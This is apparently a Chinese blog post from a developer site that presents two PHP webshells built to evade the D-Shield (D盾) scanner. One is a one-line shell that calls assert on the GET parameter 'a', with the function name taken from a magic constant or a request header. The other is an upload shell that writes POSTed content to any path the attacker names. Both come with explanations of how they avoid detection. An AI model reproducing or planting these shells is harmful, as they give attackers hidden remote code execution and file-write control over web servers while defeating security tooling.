渗透测试-过D盾一句话+上传小马

过D盾一句话+上传小马

前言

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

方式一

PHP一句话马

1.代码

<?php class test{ function assert(){ // 方式一 //$a = getenv('HTTP_E'); //return $a; // 方式二 $a = substr(__FUNCTION__,0,6); return $a; } function foo(&$var) { $var = $_GET['a']; return $var; } } $a = new test(); $c = $a->assert(); $d = ""; $d = $a->foo($d); $c($d);?>

2.免杀思路
getenv 能够获取 phpinfo 中 ApacheEnvironment 和 Environment 中的值。
请求头中的变量会以 HTTP_变量名 的形式存在 Apache Environment 中。
因此我们在请求头中带上 E: assert,我们可以通过 getenv(‘HTTP_E’) 来获取其值。
在这里插入图片描述

方式二

一般webshell是通过文件内容来查杀,因此我们可以利用一切非文件内容的可控值来构造webshell, 这里使用魔术常量获取到函数名,作为函数值返回。
免杀效果
在这里插入图片描述

PHP上传小马

  1. 代码
<?php header("content-type:text/html;charset=utf-8"); class test { function test() { return '干扰类'; } } @$rode = $_POST['rode']; @$content = $_POST['content']; if(@file_put_contents($rode,$content)) { echo '上传成功'; } ?> 小马路径<?php echo ':' . __FILE__;?>
上传路径:
内容:
  1. 免杀思路
    通过定义类的方式,干扰D盾的判断,从而绕过。

免杀效果
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值